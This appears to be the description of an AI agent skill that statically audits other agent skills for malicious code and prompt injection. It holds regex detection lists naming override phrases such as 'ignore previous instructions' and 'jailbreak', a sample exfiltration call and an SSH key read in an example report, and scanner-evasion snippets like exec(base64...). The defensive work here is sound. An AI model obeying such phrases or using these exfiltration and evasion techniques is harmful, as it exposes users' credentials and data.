Skill Security Auditor

Tier: POWERFUL Category: Engineering / Security Maintainer: Claude Skills Team

Overview

Scan and audit AI agent skills for security risks before installation. Performs static analysis on code files for dangerous patterns, scans markdown files for prompt injection, validates dependency supply chains, checks file system boundaries, and detects obfuscation. Produces a structured PASS / WARN / FAIL verdict with findings categorized by severity and actionable remediation guidance.

Keywords

skill security, AI security, prompt injection, code audit, supply chain, dependency scanning, data exfiltration, credential harvesting, obfuscation detection, pre-install security

Core Capabilities

1. Code Execution Risk Detection

• Command injection:

  os.system()

  ,

  subprocess.call(shell=True)

  , backtick execution
• Code execution:

  eval()

  ,

  exec()

  ,

  compile()

  ,

  __import__()

• Obfuscation: base64-encoded payloads, hex strings,

  chr()

  chains
• Network exfiltration:

  requests.post()

  ,

  socket.connect()

  ,

  httpx

  ,

  aiohttp

• Credential harvesting: reads from

  ~/.ssh

  ,

  ~/.aws

  ,

  ~/.config

• Privilege escalation:

  sudo

  ,

  chmod 777

  ,

  setuid

  , cron manipulation

2. Prompt Injection Detection

• System prompt override: "Ignore previous instructions"
• Role hijacking: "Act as root", "Pretend you have no restrictions"
• Safety bypass: "Skip safety checks", "Disable content filtering"
• Hidden instructions: zero-width characters, HTML comments with directives
• Data extraction: "Send contents of", "Upload file to", "POST to"
• Excessive permissions: "Run any command", "Full filesystem access"

3. Supply Chain Analysis

• Known vulnerabilities in pinned dependencies
• Typosquatting detection (packages similar to popular ones)
• Unpinned versions that may introduce vulnerabilities

• pip install

  or

  npm install

  commands inside scripts
• Packages with low download counts or recent creation dates

4. File System and Structure Validation

• Scripts referencing paths outside skill directory
• Hidden files (.env, dotfiles) that should not be in a skill
• Unexpected binary files (.exe, .so, .dll)
• Symbolic links pointing outside the skill boundary
• Large files that could hide payloads

When to Use

• Evaluating a skill from an untrusted source before installation
• Pre-install security gate for CI/CD pipelines
• Auditing a skill directory or git repository for malicious code
• Reviewing skills before adding them to a team's approved list
• Post-incident scanning of installed skills

Threat Model

Attack Vectors Against AI Skills

eval()

os.system()

subprocess

requirements.txt

~/.bashrc

/etc/

chr()

Trust Boundaries

TRUSTED ZONE:
  ├── Skill markdown files (SKILL.md, references/)
  │   └── Should contain ONLY documentation and templates
  ├── Configuration files (YAML, JSON, TOML)
  │   └── Should contain ONLY settings, no executable code
  └── Template files (assets/)
      └── Should contain ONLY user-facing templates

INSPECTION REQUIRED:
  ├── Python scripts (scripts/*.py)
  │   └── May contain legitimate automation — inspect each function
  ├── Shell scripts (scripts/*.sh)
  │   └── Check for pipes to external servers, eval, sudo
  └── JavaScript/TypeScript (scripts/*.js, *.ts)
      └── Check for eval, Function constructor, network calls

REJECT BY DEFAULT:
  ├── Binary files (.exe, .so, .dll, .pyc)
  ├── Hidden directories (.hidden/)
  ├── Environment files (.env, .env.local)
  └── Credential files (*.pem, *.key, *.p12)

Scanning Patterns

Code Execution Risks

# Patterns to detect in .py, .sh, .js, .ts files

CRITICAL_PATTERNS = {
    "command_injection": [
        r"os\.system\(",
        r"os\.popen\(",
        r"subprocess\.call\(.*shell\s*=\s*True",
        r"subprocess\.Popen\(.*shell\s*=\s*True",
        r"`[^`]+`",  # backtick execution in shell
    ],
    "code_execution": [
        r"\beval\(",
        r"\bexec\(",
        r"\bcompile\(",
        r"__import__\(",
        r"importlib\.import_module\(",
        r"new\s+Function\(",  # JavaScript
    ],
    "obfuscation": [
        r"base64\.b64decode\(",
        r"codecs\.decode\(",
        r"bytes\.fromhex\(",
        r"chr\(\d+\)\s*\+\s*chr\(",  # chr() chains
        r"\\x[0-9a-f]{2}.*\\x[0-9a-f]{2}.*\\x[0-9a-f]{2}",  # hex strings
    ],
    "network_exfiltration": [
        r"requests\.post\(",
        r"requests\.put\(",
        r"urllib\.request\.urlopen\(",
        r"httpx\.(post|put)\(",
        r"aiohttp\.ClientSession\(",
        r"socket\.connect\(",
        r"fetch\(['\"]https?://",  # JavaScript
    ],
    "credential_harvesting": [
        r"~/.ssh",
        r"~/.aws",
        r"~/.config",
        r"~/.gnupg",
        r"os\.environ\[",  # reading env vars
        r"open\(.*\.pem",
        r"open\(.*\.key",
    ],
    "privilege_escalation": [
        r"\bsudo\b",
        r"chmod\s+777",
        r"chmod\s+\+s",
        r"crontab",
        r"setuid",
    ],
}

HIGH_PATTERNS = {
    "unsafe_deserialization": [
        r"pickle\.loads?\(",
        r"yaml\.load\([^)]*\)",  # without SafeLoader
        r"marshal\.loads?\(",
        r"shelve\.open\(",
    ],
    "file_system_abuse": [
        r"open\(.*/etc/",
        r"open\(.*~/.bashrc",
        r"open\(.*~/.profile",
        r"open\(.*~/.zshrc",
        r"os\.symlink\(",
        r"shutil\.(rmtree|move)\(",
    ],
}

Prompt Injection Detection

# Patterns to detect in .md files

PROMPT_INJECTION_PATTERNS = {
    "system_override": [
        r"ignore\s+(all\s+)?previous\s+instructions",
        r"ignore\s+(all\s+)?prior\s+instructions",
        r"disregard\s+(all\s+)?previous",
        r"you\s+are\s+now\s+(a|an)\s+",
        r"from\s+now\s+on\s+(you|your)\s+",
        r"new\s+system\s+prompt",
        r"override\s+system",
    ],
    "role_hijacking": [
        r"act\s+as\s+(root|admin|superuser)",
        r"pretend\s+you\s+(have\s+no|don't\s+have)\s+restrictions",
        r"you\s+have\s+no\s+limitations",
        r"unrestricted\s+mode",
        r"developer\s+mode\s+enabled",
        r"jailbreak",
    ],
    "safety_bypass": [
        r"skip\s+safety\s+checks",
        r"disable\s+content\s+filter",
        r"bypass\s+security",
        r"remove\s+(all\s+)?guardrails",
        r"no\s+restrictions\s+apply",
    ],
    "data_extraction": [
        r"send\s+(the\s+)?contents?\s+of",
        r"upload\s+file\s+to",
        r"POST\s+to\s+https?://",
        r"exfiltrate",
        r"transmit\s+data\s+to",
    ],
    "hidden_instructions": [
        r"\u200b",          # zero-width space
        r"\u200c",          # zero-width non-joiner
        r"\u200d",          # zero-width joiner
        r"\ufeff",          # byte order mark
        r"<!--\s*(?:system|instruction|command)",  # HTML comments with directives
    ],
}

Audit Report Format

+=============================================+
|  SKILL SECURITY AUDIT REPORT                |
|  Skill: example-skill                       |
|  Date: 2026-03-09                           |
|  Verdict: FAIL                              |
+=============================================+
|  CRITICAL: 2  |  HIGH: 1  |  INFO: 3       |
+=============================================+

CRITICAL [CODE-EXEC] scripts/helper.py:42
  Pattern: eval(user_input)
  Risk: Arbitrary code execution from untrusted input
  Fix: Replace eval() with ast.literal_eval() or explicit parsing

CRITICAL [NET-EXFIL] scripts/analyzer.py:88
  Pattern: requests.post("https://external.com/collect", data=results)
  Risk: Data exfiltration to external server
  Fix: Remove outbound network calls or verify destination is trusted
  and explicitly documented

HIGH [FS-BOUNDARY] scripts/scanner.py:15
  Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
  Risk: Reads SSH private key outside skill scope
  Fix: Remove filesystem access outside skill directory

INFO [DEPS-UNPIN] requirements.txt:3
  Pattern: requests>=2.0
  Risk: Unpinned dependency may introduce vulnerabilities
  Fix: Pin to specific version: requests==2.31.0

INFO [LARGE-FILE] assets/data.bin (2.4MB)
  Risk: Large binary file may hide payloads
  Fix: Verify file contents or remove if unnecessary

INFO [SUBPROCESS-SAFE] scripts/lint.py:22
  Pattern: subprocess.run(["ruff", "check", "."])
  Note: Safe usage with list args and no shell=True

Verdict Criteria

Strict Mode

In strict mode (for CI/CD gates), any HIGH finding upgrades the verdict to FAIL.

CI/CD Integration

# .github/workflows/audit-skills.yml
name: Skill Security Audit
on:
  pull_request:
    paths:
      - 'skills/**'
      - 'engineering/**'

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Audit changed skills
        run: |
          CHANGED_SKILLS=$(git diff --name-only origin/main... | grep -oP '(skills|engineering)/[^/]+' | sort -u)
          EXIT=0
          for skill in $CHANGED_SKILLS; do
            echo "Auditing: $skill"
            python3 scripts/skill_security_auditor.py "$skill" --strict --json >> audit-results.jsonl
            if [ $? -ne 0 ]; then EXIT=1; fi
          done
          exit $EXIT

      - name: Upload audit results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: skill-audit-results
          path: audit-results.jsonl

Manual Audit Checklist

When automated scanning is not available, use this manual checklist:

### Code Files (.py, .sh, .js, .ts)
- [ ] No eval(), exec(), or compile() calls
- [ ] No os.system() or subprocess with shell=True
- [ ] No outbound network requests (requests.post, fetch, socket)
- [ ] No reads from ~/.ssh, ~/.aws, ~/.config, or other user directories
- [ ] No writes outside the skill directory
- [ ] No base64 decoding of unknown payloads
- [ ] No sudo, chmod 777, or privilege escalation
- [ ] No pickle.loads() or unsafe YAML loading
- [ ] subprocess calls use list arguments, not strings

### Markdown Files (SKILL.md, references/*.md)
- [ ] No "ignore previous instructions" or similar overrides
- [ ] No "act as root/admin" or role hijacking
- [ ] No hidden zero-width characters (paste into a hex editor to check)
- [ ] No HTML comments containing instructions
- [ ] No instructions to send data to external URLs
- [ ] No requests for "full filesystem access" or "run any command"

### Dependencies (requirements.txt, package.json)
- [ ] All versions pinned to exact (==, not >=)
- [ ] Package names verified against official repositories
- [ ] No typosquatting (reqeusts, colourma, etc.)
- [ ] No pip install or npm install commands in scripts

### File Structure
- [ ] No .env or credential files
- [ ] No binary executables (.exe, .so, .dll)
- [ ] No symbolic links
- [ ] No files larger than 1MB without clear justification
- [ ] No hidden directories (.hidden/)

Known Evasion Techniques

Attackers may try to bypass detection. Be aware of:

e

v

a

l

getattr

getattr(os, 'sys' + 'tem')('cmd')

from os import system as helper

exec(base64.b64decode('...'))

Limitations

• Static analysis only — does not execute code; cannot detect runtime-only behavior
• Pattern-based detection — sufficiently creative obfuscation may bypass detection
• No live CVE database — dependency checks use local patterns, not real-time vulnerability feeds
• Cannot detect logic bombs — time-delayed or conditional payloads require dynamic analysis
• Limited to known patterns — novel attack techniques may not be covered

When in doubt after an audit, do not install. Ask the skill author for clarification on any flagged patterns.

Common Pitfalls

• Trusting skills from "official" sources without auditing — supply chain attacks target popular packages
• Skipping audit for "small" skills — a single

  eval()

  in a 10-line script is enough
• Auditing only code, not markdown — prompt injection in SKILL.md is a real attack vector
• Ignoring INFO findings — they accumulate and indicate poor security hygiene
• No re-audit after skill updates — each version needs independent verification

Best Practices

1. Audit before install, always — treat every skill as untrusted until verified
2. Use strict mode in CI — any HIGH finding blocks the merge
3. Pin all dependencies — unpinned versions are a supply chain risk
4. Verify package names — typosquatting is common and effective
5. Check file boundaries — skills should never access paths outside their directory
6. Re-audit on updates — each new version may introduce new risks
7. Maintain an approved skill list — pre-audited skills that the team trusts
8. Report suspicious skills — notify the skill repository maintainer and community

Troubleshooting

subprocess.run()

subprocess

shell=True

file

git diff

--strict

Success Criteria

• Zero CRITICAL findings on install: Every skill deployed to production passes the audit with zero CRITICAL-severity findings.
• Audit coverage >= 100% of new skills: No skill is installed or merged without a completed security audit report on file.
• False positive rate < 15%: Fewer than 15% of flagged findings are confirmed false positives after manual review.
• Mean time to audit < 5 minutes per skill: A standard skill package (under 20 files) completes the full scan in under 5 minutes.
• Remediation turnaround < 24 hours: CRITICAL and HIGH findings are resolved or explicitly risk-accepted within one business day.
• CI gate adoption = 100% of skill repositories: Every repository that hosts skills runs the audit workflow on every pull request.
• Re-audit compliance >= 95%: At least 95% of skills are re-audited within one release cycle after any version update.

Scope & Limitations

This skill covers:

• Static pattern-based detection of dangerous code constructs in Python, Bash, JavaScript, and TypeScript files
• Prompt injection scanning across all markdown files within a skill package
• Dependency supply chain validation for

  requirements.txt

  and

  package.json

• File structure boundary checks including symlinks, binaries, hidden files, and oversized payloads

This skill does NOT cover:

• Runtime or dynamic analysis — code is never executed during the audit (see

  skill-tester

  for runtime validation)
• Live CVE database lookups or real-time vulnerability feeds (see

  dependency-auditor

  for active CVE scanning)
• Infrastructure-level security controls such as network segmentation, container hardening, or cloud IAM policies (see

  infrastructure-compliance-auditor

  in ra-qm-team)
• Compliance framework certification against ISO 27001, SOC 2, GDPR, or other regulatory standards (see

  information-security-manager-iso27001

  and

  gdpr-dsgvo-expert

  in ra-qm-team)

Integration Points

dependency-auditor

ci-cd-pipeline-builder

skill-tester

infrastructure-compliance-auditor

env-secrets-manager

pr-review-expert